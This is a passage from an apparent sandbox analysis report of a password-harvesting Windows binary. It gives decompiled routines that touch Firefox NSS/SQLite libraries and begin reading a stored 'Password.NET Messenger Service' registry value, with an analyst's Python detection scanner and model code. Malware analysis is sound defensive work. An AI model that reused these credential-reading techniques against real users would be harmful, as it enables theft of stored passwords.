                                                  					// Cache the INI path and the section name "general" in the globals that the
                                                  					// GetPrivateProfile* helpers below read their section/file arguments from.
                                                  					strcpy(0x4171b8, _a4);
                                                  					strcpy(0x4172c0, "general");
                                                  					// [general] rtl=<n>: read as an integer and stored at 0x417304 as a flag.
                                                  					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
                                                  					asm("sbb eax, eax");
                                                  					 *0x417304 =  ~(_t6 - 1) + 1;
                                                  					// E00407DC1 wraps GetPrivateProfileStringA(section, key, default, buffer, size, file):
                                                  					// charset and TranslatorName into 0x3f-byte buffers, TranslatorURL into a 0xff-byte one.
                                                  					E00407DC1(0x417308, "charset", 0x3f);
                                                  					E00407DC1(0x417348, "TranslatorName", 0x3f);
                                                  					return E00407DC1(0x417388, "TranslatorURL", 0xff);
                                                  				}
                                                  				return _t3;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                  • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                  • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                  • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                    • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfilestrcpy$AttributesFileString
                                                  • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 185930432-2094606381
                                                  • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                  • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                  • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                  • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040DEA9() {
                                                  				int _t3;
                                                  				struct HINSTANCE__* _t5;
                                                  				struct HINSTANCE__* _t6;
                                                  				struct HINSTANCE__* _t9;
                                                  
                                                  				// Look up, without loading, the Mozilla NSS (nss3.dll) and SQLite (sqlite3.dll, mozsqlite3.dll)
                                                  				// libraries needed to read Firefox profile databases, then release each one that is present.
                                                  				// GetModuleHandleA does not add a reference, so each FreeLibrary undoes an earlier LoadLibrary.
                                                  				_t6 = GetModuleHandleA("nss3.dll");
                                                  				_t5 = GetModuleHandleA("sqlite3.dll");
                                                  				_t3 = GetModuleHandleA("mozsqlite3.dll");
                                                  				_t9 = _t3;
                                                  				if(_t6 != 0) {
                                                  					_t3 = FreeLibrary(_t6);
                                                  				}
                                                  				if(_t5 != 0) {
                                                  					_t3 = FreeLibrary(_t5);
                                                  				}
                                                  				if(_t9 != 0) {
                                                  					return FreeLibrary(_t9);
                                                  				}
                                                  				return _t3;
                                                  			}

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(nss3.dll,74B057D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                  • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHandleLibraryModule
                                                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                  • API String ID: 662261464-3550686275
                                                  • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                  • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                  • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                  • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
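
The three listings above each leave a distinctive string set in the unpacked image: the four GUIDs handed to UuidFromStringA, the [general] / rtl / charset / TranslatorName / TranslatorURL keys read by E004081B5, and the nss3.dll / sqlite3.dll / mozsqlite3.dll names released by E0040DEA9. The following Python is an added triage example, not code from this report or from the sample: it scans a memory dump for those string groups and reports only the groups that clear a per-group threshold, so that common words such as "general" or "rtl" cannot fire on their own. The indicator values are the String IDs quoted in the listings; the dump bytes are constructed inline and are not real process memory.

```python
"""Triage scanner for the string groups seen in the decompiled functions above.

Added example. Indicator values come from the report's String IDs; SAMPLE_DUMP is
constructed here as a stand-in for an unpacked image and is not real process memory.
"""
from __future__ import annotations

import re

# group name -> (indicators, minimum number of distinct indicators before the group is reported)
INDICATOR_GROUPS: dict[str, tuple[tuple[bytes, ...], int]] = {
    # The four GUID strings the sample resolves at run time with UuidFromStringA.
    "uuid_from_string_guids": ((
        b"220D5CD0-853A-11D0-84BC-00C04FD43F8F",
        b"220D5CD1-853A-11D0-84BC-00C04FD43F8F",
        b"220D5CC1-853A-11D0-84BC-00C04FD43F8F",
        b"417E2D75-84BD-11D0-84BB-00C04FD43F8F",
    ), 2),
    # INI section and keys read by E004081B5; threshold 4 because "general"/"rtl" are common.
    "translation_ini_loader": ((
        b"general", b"rtl", b"charset", b"TranslatorName", b"TranslatorURL",
    ), 4),
    # Libraries released by E0040DEA9 (Mozilla NSS and SQLite, used to read Firefox profiles).
    # Substring matching is deliberate: "sqlite3.dll" also hits inside "mozsqlite3.dll".
    "firefox_db_libraries": ((
        b"nss3.dll", b"sqlite3.dll", b"mozsqlite3.dll",
    ), 2),
    # Keyword of the NT-path normaliser E0040E172.
    "nt_path_normaliser": ((b"\\systemroot",), 1),
}


def _present(dump: bytes, needle: bytes) -> bool:
    """True if the indicator occurs as ASCII or as UTF-16LE, case-insensitively.

    Binaries carry either encoding, and a wide-string copy is easy to miss otherwise.
    """
    narrow = re.escape(needle)
    wide = re.escape(needle.decode("ascii").encode("utf-16-le"))
    return (re.search(narrow, dump, re.IGNORECASE) is not None
            or re.search(wide, dump, re.IGNORECASE) is not None)


def scan_dump(dump: bytes) -> dict[str, list[str]]:
    """Return {group: [indicators found]} for every group that met its threshold."""
    hits: dict[str, list[str]] = {}
    for group, (needles, threshold) in INDICATOR_GROUPS.items():
        found = [n.decode("ascii") for n in needles if _present(dump, n)]
        if len(found) >= threshold:
            hits[group] = found
    return hits


# Constructed stand-in for an unpacked image: a subset of the report's strings between
# padding bytes, with one of them (nss3.dll) stored as UTF-16LE to exercise the wide match.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"220D5CD0-853A-11D0-84BC-00C04FD43F8F\x00"
    + b"220D5CC1-853A-11D0-84BC-00C04FD43F8F\x00"
    + b"general\x00rtl\x00charset\x00TranslatorName\x00TranslatorURL\x00"
    + "nss3.dll".encode("utf-16-le") + b"\x00\x00"
    + b"mozsqlite3.dll\x00"
    + b"\x00" * 16
)

if __name__ == "__main__":
    for group, found in scan_dump(SAMPLE_DUMP).items():
        print(f"{group}: {', '.join(found)}")
```

Run it against a real dump by replacing SAMPLE_DUMP with the bytes of the .sdmp file named under Memory Dump Source; the thresholds are the knob to tune when a group produces noise on clean binaries.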

                                                  C-Code - Quality: 86%
                                                  			E0040E172(char* __edi, char* __esi) {
                                                  				void _v267;
                                                  				char _v268;
                                                  				char* _t15;
                                                  				void* _t38;
                                                  				char* _t48;
                                                  
                                                  				_t49 = __esi;
                                                  				_t48 = __edi;
                                                  				// Normalise the path in __esi into a Win32 path written to __edi, which is returned.
                                                  				// Case 1 (bottom else branch, L4): "X:..." already has a drive letter at [1], copied unchanged.
                                                  				if(__esi[1] != 0x3a) {
                                                  					// Case 2: a ':' further in, e.g. "\??\C:\...": copy from the drive letter just before it (L4).
                                                  					_t15 = strchr( &(__esi[2]), 0x3a);
                                                  					if(_t15 == 0) {
                                                  						// No drive letter anywhere. E004069D2 (strlen, strlen, _memicmp in its subcalls)
                                                  						// behaves as a case-insensitive substring search; a negative result means not found.
                                                  						_t38 = E004069D2(0, "\\systemroot");
                                                  						if(_t38 < 0) {
                                                  							if( *__esi != 0x5c) {
                                                  								// Relative path: copied unchanged.
                                                  								strcpy(__edi, __esi);
                                                  							} else {
                                                  								// Rooted but drive-less ("\dir\..."): prefix the two-character "X:" of the
                                                  								// Windows directory that E00406325 (GetWindowsDirectoryA) fills into _v268.
                                                  								_v268 = 0;
                                                  								memset( &_v267, 0, 0x104);
                                                  								E00406325( &_v268);
                                                  								memcpy(__edi,  &_v268, 2);
                                                  								__edi[2] = 0;
                                                  								strcat(__edi, __esi);
                                                  							}
                                                  						} else {
                                                  							// "\systemroot\...": the Windows directory followed by whatever comes after the
                                                  							// 11-character prefix (the 0xb skip). None of the strcpy/strcat calls bound __edi.
                                                  							_v268 = 0;
                                                  							memset( &_v267, 0, 0x104);
                                                  							E00406325( &_v268);
                                                  							strcpy(__edi,  &_v268);
                                                  							_t8 =  &(_t49[0xb]); // 0xb
                                                  							strcat(__edi, _t38 + _t8);
                                                  						}
                                                  						L11:
                                                  						return _t48;
                                                  					}
                                                  					_push(_t15 - 1);
                                                  					L4:
                                                  					strcpy(_t48, ??);
                                                  					goto L11;
                                                  				}
                                                  				_push(__esi);
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • strchr.MSVCRT ref: 0040E18A
                                                  • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                    • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                    • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                    • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                  • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                  • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                  • memset.MSVCRT ref: 0040E1CF
                                                    • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                    • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                  • memset.MSVCRT ref: 0040E217
                                                  • memcpy.MSVCRT ref: 0040E232
                                                  • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                  • String ID: \systemroot
                                                  • API String ID: 1680921474-1821301763
                                                  • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                  • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                  • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                  • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
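
E0040E172 above turns a path taken from a profile or registry value into one the Win32 file APIs accept: a path with a drive letter at index 1 is kept, a path with a ':' further in (the "\??\C:\..." form) is copied from the drive letter, a "\systemroot" prefix is replaced by the Windows directory, a rooted path without a drive gets the Windows directory's drive, and anything else is copied unchanged. The following Python is an added model of that behaviour written for this page, not the sample's own code, so each branch can be exercised offline. It assumes E004069D2 is a case-insensitive substring search (inferred from its strlen/strlen/_memicmp subcalls), that E00406325 is GetWindowsDirectoryA, and it substitutes a fixed Windows directory for the real API result.

```python
"""Model of the path normalisation in E0040E172 (added example, not the sample's code).

Assumptions: E004069D2 is a case-insensitive substring search returning an offset or a
negative value; E00406325 is GetWindowsDirectoryA; WINDOWS_DIR stands in for its result.
"""

WINDOWS_DIR = "C:\\Windows"            # assumed value; the sample asks GetWindowsDirectoryA
SYSTEMROOT_PREFIX = "\\systemroot"      # 11 characters, the 0xb skip in the listing


def to_win32_path(src: str, windows_dir: str = WINDOWS_DIR) -> str:
    """Return the Win32 form of src following the branches of E0040E172."""
    # Case 1: "X:\..." already carries a drive letter at index 1 -> copied unchanged.
    if len(src) > 1 and src[1] == ":":
        return src
    # Case 2: a ':' after index 1, e.g. "\??\C:\Users\..." -> copy from the character
    # before it, which drops the NT "\??\" style prefix.
    colon = src.find(":", 2)
    if colon != -1:
        return src[colon - 1:]
    # Case 3: "\SystemRoot\..." in any case -> Windows directory plus whatever follows the
    # 11-character prefix. As in the listing, the match is not anchored to the start.
    idx = src.lower().find(SYSTEMROOT_PREFIX)
    if idx >= 0:
        return windows_dir + src[idx + len(SYSTEMROOT_PREFIX):]
    # Case 4: rooted but drive-less ("\Program Files\...") -> prefix the first two
    # characters of the Windows directory, i.e. its "X:".
    if src.startswith("\\"):
        return windows_dir[:2] + src
    # Case 5: relative path -> copied unchanged.
    return src


if __name__ == "__main__":
    for sample in ("C:\\Users\\bob\\profiles.ini",
                   "\\??\\C:\\Users\\bob\\profiles.ini",
                   "\\SystemRoot\\system32\\config",
                   "\\Program Files\\App\\x.db",
                   "relative\\x.db"):
        print(f"{sample!r:45} -> {to_win32_path(sample)!r}")
```

The model keeps one property of the original worth noticing during analysis: the "\systemroot" search is a substring search, so the prefix is honoured wherever it appears, not only at the start of the string. What the model does not reproduce is the unbounded strcpy/strcat into the caller's buffer.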

                                                  C-Code - Quality: 67%
                                                  			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                  				void* __esi;
                                                  				intOrPtr* _t27;
                                                  				void* _t30;
                                                  				struct HWND__* _t32;
                                                  				void* _t35;
                                                  				intOrPtr* _t36;
                                                  
                                                  				_t30 = __edx;
                                                  				_t27 = __ecx;
                                                  				_push(__ebx);
                                                  				_push(__edi);
                                                  				// Dialog initialisation: cache the dialog HWND and its client rectangle in the object,
                                                  				// then walk the child windows (GetWindow with GW_CHILD = 5, GW_HWNDFIRST = 0,
                                                  				// GW_HWNDNEXT = 2), passing each to E00401657 (GetWindowRect + MapWindowPoints).
                                                  				_t32 =  *(__ecx + 4);
                                                  				_t35 = __ecx + 0xc;
                                                  				 *(_t35 + 0x10) = _t32;
                                                  				GetClientRect(_t32, _t35 + 0xa14);
                                                  				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
                                                  				GetWindow(GetWindow(_t32, 5), 0);
                                                  				do {
                                                  					__eax = E00401657(__edi, __esi);
                                                  					__edi = GetWindow(__edi, 2);
                                                  				} while (__edi != 0);
                                                  				// Controls 0x3ed, 0x3ee, 0x3ef and 0x3f4 are looked up with GetDlgItem and handed to
                                                  				// E0040F037; focus finally goes to control 0x3ed. (Register-level decompiler output below.)
                                                  				__esi = GetDlgItem;
                                                  				__edi = 0x3ed;
                                                  				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
                                                  				 *__esp = 0x3ee;
                                                  				GetDlgItem(??, ??) = E0040F037(__eax);
                                                  				 *__esp = 0x3ef;
                                                  				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
                                                  				 *__esp = 0x3f4;
                                                  				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
                                                  				__eax =  *(__ebx + 4);
                                                  				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
                                                  				_pop(__edi);
                                                  				_pop(__esi);
                                                  				__ecx = __ebx;
                                                  				_pop(__ebx);
                                                  				_t36 = _t27;
                                                  				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
                                                  				 *((intOrPtr*)( *_t36 + 0x18))();
                                                  				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • GetClientRect.USER32 ref: 00405BFB
                                                  • GetWindow.USER32(?,00000005), ref: 00405C13
                                                  • GetWindow.USER32(00000000), ref: 00405C16
                                                    • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                    • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                  • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                  • GetDlgItem.USER32 ref: 00405C39
                                                  • GetDlgItem.USER32 ref: 00405C4B
                                                  • GetDlgItem.USER32 ref: 00405C5D
                                                  • GetDlgItem.USER32 ref: 00405C6F
                                                  • GetDlgItem.USER32 ref: 00405C7D
                                                  • SetFocus.USER32(00000000), ref: 00405C80
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemWindow$Rect$ClientFocusPoints
                                                  • String ID:
                                                  • API String ID: 2187283481-0
                                                  • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                  • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                  • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                  • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E00401A50(char* __edi, int __fp0) {
                                                  				void* _v8;
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				int _v28;
                                                  				int _v36;
                                                  				void* _v40;
                                                  				void* _v44;
                                                  				void* _v48;
                                                  				void* _v52;
                                                  				void* _v56;
                                                  				void* _v60;
                                                  				char _v64;
                                                  				int _t79;
                                                  				intOrPtr _t80;
                                                  				int _t81;
                                                  				signed int _t94;
                                                  				int _t98;
                                                  				int _t100;
                                                  				void* _t104;
                                                  				void* _t106;
                                                  				intOrPtr _t115;
                                                  				char _t117;
                                                  				char* _t118;
                                                  				void* _t119;
                                                  				void* _t120;
                                                  				int _t122;
                                                  				signed int _t123;
                                                  				int* _t125;
                                                  				int _t159;
                                                  				int _t165;
                                                  
                                                  				_t159 = __fp0;
                                                  				_t118 = __edi;
                                                  				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                  				_t79 = strlen(__edi);
                                                  				asm("fldz");
                                                  				_t104 = 0;
                                                  				_v28 = __fp0;
                                                  				_t120 = 0;
                                                  				_t106 = _t119;
                                                  				_v36 = _t79;
                                                  				_v56 = 0;
                                                  				_v52 = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v60 = 0;
                                                  				_v40 = 0;
                                                  				_v12 = 0x20;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v16 = 0;
                                                  				if(_t79 > 0) {
                                                  					do {
                                                  						// Each input byte is classified into one of the disjoint ranges below;
                                                  						// the per-class counters (_v56.._v40) are only tested for non-zero after the loop.
                                                  						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                  						_v64 = _t117;
                                                  						if(_t117 - 0x41 <= 0x19) {		// 'A'..'Z'
                                                  							_v56 = _v56 + 1;
                                                  						}
                                                  						if(_t117 - 0x61 <= 0x19) {		// 'a'..'z'
                                                  							_v52 = _v52 + 1;
                                                  						}
                                                  						if(_t117 - 0x30 <= 9) {		// '0'..'9'
                                                  							_v48 = _v48 + 1;
                                                  						}
                                                  						if(_t117 - 0x20 <= 0xf) {		// ' '..'/' (16 bytes)
                                                  							_v44 = _v44 + 1;
                                                  						}
                                                  						if(_t117 - 0x3a <= 6) {		// ':'..'@' (7 bytes)
                                                  							_v60 = _v60 + 1;
                                                  						}
                                                  						if(_t117 - 0x5b <= 5) {		// '['..'`' (6 bytes)
                                                  							_v60 = _v60 + 1;
                                                  						}
                                                  						if(_t117 < 0x7b) {
                                                  							L16:
                                                  							if(_t117 > 0x7e) {		// 0x7f and above
                                                  								goto L17;
                                                  							}
                                                  						} else {
                                                  							if(_t117 > 0x7e) {
                                                  								L17:
                                                  								_v40 = _v40 + 1;		// outside printable ASCII
                                                  							} else {
                                                  								_v60 = _v60 + 1;		// '{'..'~' (4 bytes)
                                                  								goto L16;
                                                  							}
                                                  						}
                                                  						if(_t120 != _t104) {
                                                  							_t94 = 0;
                                                  							if(_v8 <= 0) {
                                                  								L27:
                                                  								_t94 = _t94 | 0xffffffff;
                                                  							} else {
                                                  								L21:
                                                  								L21:
                                                  								if(_t94 < 0 || _t94 >= _v8) {
                                                  									_t115 = 0;
                                                  								} else {
                                                  									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                  								}
                                                  								if(_t115 == _t117) {
                                                  									goto L28;
                                                  								}
                                                  								_t94 = _t94 + 1;
                                                  								if(_t94 < _v8) {
                                                  									goto L21;
                                                  								} else {
                                                  									goto L27;
                                                  								}
                                                  							}
                                                  							L28:
                                                  							_t104 = 0;
                                                  							if(_t94 < 0) {
                                                  								E004045E8( &_v20, _v64);
                                                  								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                  								_pop(_t106);
                                                  								if(_t98 != 1) {
                                                  									_t47 = _t98 - 2; // -2
                                                  									_t106 = _t47;
                                                  									if(_t106 > 3) {
                                                  										if(_t98 < 6) {
                                                  											if(_t98 > 0xa) {
                                                  												goto L40;
                                                  											}
                                                  										} else {
                                                  											if(_t98 > 0xa) {
                                                  												goto L40;
                                                  											} else {
                                                  												_t159 = _v28 +  *0x414510;
                                                  											}
                                                  											goto L41;
                                                  										}
                                                  									} else {
                                                  										_t159 = _v28 +  *0x414518;
                                                  										goto L41;
                                                  									}
                                                  								} else {
                                                  									_t165 = _v28;
                                                  									goto L30;
                                                  								}
                                                  							} else {
                                                  								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
                                                  								_t165 = _v28;
                                                  								_pop(_t106);
                                                  								if(_t100 != 0) {
                                                  									_t159 = _t165 +  *0x414520;
                                                  								} else {
                                                  									L30:
                                                  									_t159 = _t165 +  *0x414528;
                                                  								}
                                                  								goto L41;
                                                  							}
                                                  						} else {
                                                  							E004045E8( &_v20, _v64);
                                                  							L40:
                                                  							_t159 = _v28 +  *0x414508;
                                                  							L41:
                                                  							_v28 = _t159;
                                                  						}
                                                  						_t120 = _t120 + 1;
                                                  					} while (_t120 < _v36);
                                                  				}
                                                  				// Alphabet size implied by the classes that occurred at least once:
                                                  				// 26 upper + 26 lower + 10 digits + 16 + 17 punctuation + 30 non-ASCII (125 at most).
                                                  				_v64 = _t104;
                                                  				_t80 = 0x1a;
                                                  				if(_v56 != _t104) {
                                                  					_v64 = _t80;		// +26
                                                  				}
                                                  				if(_v52 != _t104) {
                                                  					_v64 = _v64 + _t80;		// +26
                                                  				}
                                                  				if(_v48 != _t104) {
                                                  					_v64 = _v64 + 0xa;		// +10
                                                  				}
                                                  				if(_v44 != _t104) {
                                                  					_v64 = _v64 + 0x10;		// +16
                                                  				}
                                                  				if(_v60 != _t104) {
                                                  					_v64 = _v64 + 0x11;		// +17 (7 + 6 + 4)
                                                  				}
                                                  				if(_v40 != _t104) {
                                                  					_v64 = _v64 + 0x1e;		// +30
                                                  				}
                                                  				if(_v64 <= _t104) {
                                                  					if(_v20 != _t104) {
                                                  						free(_v20);
                                                  					}
                                                  					_t81 = 0;
                                                  				} else {
                                                  					asm("fild dword [esp+0xc]");
                                                  					_push(_t106);
                                                  					_push(_t106);
                                                  					 *_t125 = _t159;
                                                  					L004115B8();
                                                  					_v36 = _t159;
                                                  					 *_t125 =  *0x414500;
                                                  					L004115B8();
                                                  					asm("fdivr qword [esp+0x30]");
                                                  					asm("fistp qword [esp+0x30]");
                                                  					_t122 = _v28;
                                                  					if(_v20 != _t104) {
                                                  						free(_v20);
                                                  					}
                                                  					_t81 = _t122;
                                                  				}
                                                  				return _t81;
                                                  			}

                                                  Per-line instruction addresses for E00401A50: 0x00401a50 .. 0x00401c96 (side-by-side address column not reproduced)

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$strlen
                                                  • String ID:
                                                  • API String ID: 667451143-3916222277
                                                  • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                  • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                  • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                  • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
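Readable restatement of the character-class tally in E00401A50, added here as an analyst's example; it is not code from the sample or from the sandbox. The byte ranges and the per-class alphabet increments (26, 26, 10, 16, 17, 30) are taken directly from the decompilation above. The per-character sequence scoring that adds the 8-byte constants at 0x414508..0x414528 to _v28 is not reproduced, because those values are not in the dump; the final len * log2(alphabet) figure is the conventional entropy estimate such a tally feeds and is an assumption about intent, not a reconstruction of the FPU sequence at the end of the routine. Treating bytes above 0x7e as one class assumes the byte is read unsigned.

```python
import math

# Byte ranges tested by the classification loop in E00401A50, and the amount each
# class adds to the alphabet-size estimate after the loop (0x1a, 0x1a, 0xa, 0x10, 0x11, 0x1e).
CLASSES = (
    # name         inclusive byte ranges                          alphabet increment
    ("upper",      ((0x41, 0x5a),),                               26),
    ("lower",      ((0x61, 0x7a),),                               26),
    ("digit",      ((0x30, 0x39),),                               10),
    ("punct_low",  ((0x20, 0x2f),),                               16),
    ("punct_mid",  ((0x3a, 0x40), (0x5b, 0x60), (0x7b, 0x7e)),    17),
    ("other",      ((0x7f, 0xff),),                               30),  # assumes an unsigned byte read
)


def tally_classes(password: bytes) -> dict:
    """Count how many bytes of `password` fall into each class (mirrors _v56.._v40)."""
    counts = {name: 0 for name, _, _ in CLASSES}
    for b in password:
        for name, ranges, _ in CLASSES:
            if any(lo <= b <= hi for lo, hi in ranges):
                counts[name] += 1
                break  # the ranges are disjoint, so one class per byte
    return counts


def alphabet_size(counts: dict) -> int:
    """Sum the increments of every class seen at least once (mirrors the _v64 build-up)."""
    return sum(inc for name, _, inc in CLASSES if counts.get(name, 0))


def entropy_bits(password: bytes) -> float:
    """len * log2(alphabet): the conventional figure such a tally feeds (assumption about intent).

    Returns 0.0 when no class matched, as the decompiled routine returns 0 in that case.
    """
    size = alphabet_size(tally_classes(password))
    if size == 0:
        return 0.0
    return len(password) * math.log2(size)


if __name__ == "__main__":
    for pw in (b"password", b"Passw0rd!", b"\x7f\xff", b""):
        counts = tally_classes(pw)
        print(pw, counts, alphabet_size(counts), round(entropy_bits(pw), 2))
```

Run against a candidate string to see which classes the routine would credit; a string made only of bytes 0x00..0x1f matches no class and scores 0, exactly as the `_v64 <= _t104` branch does.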

                                                  C-Code - Quality: 100%
                                                  			E0040D4A6(char* __ebx, void** _a4) {
                                                  				int _v8;
                                                  				int _v12;
                                                  				int _v16;
                                                  				void* _v20;
                                                  				int _v24;
                                                  				char* _v28;
                                                  				char _v32;
                                                  				char _v556;
                                                  				char _v557;
                                                  				char _v1578;
                                                  				void _v1580;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t39;
                                                  				int _t43;
                                                  				char _t48;
                                                  				char* _t63;
                                                  				int* _t67;
                                                  
                                                  				_t63 = __ebx;		// caller's output buffer: user name at +0, password at +0x100
                                                  				_t67 = 0;
                                                  				_v16 = 0;		// return value: 1 only when both values were read
                                                  				_v12 = 0x400;		// size of the _v1580 buffer
                                                  				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
                                                  				if(_t39 != 0) {
                                                  					L13:
                                                  					RegCloseKey( *_a4);
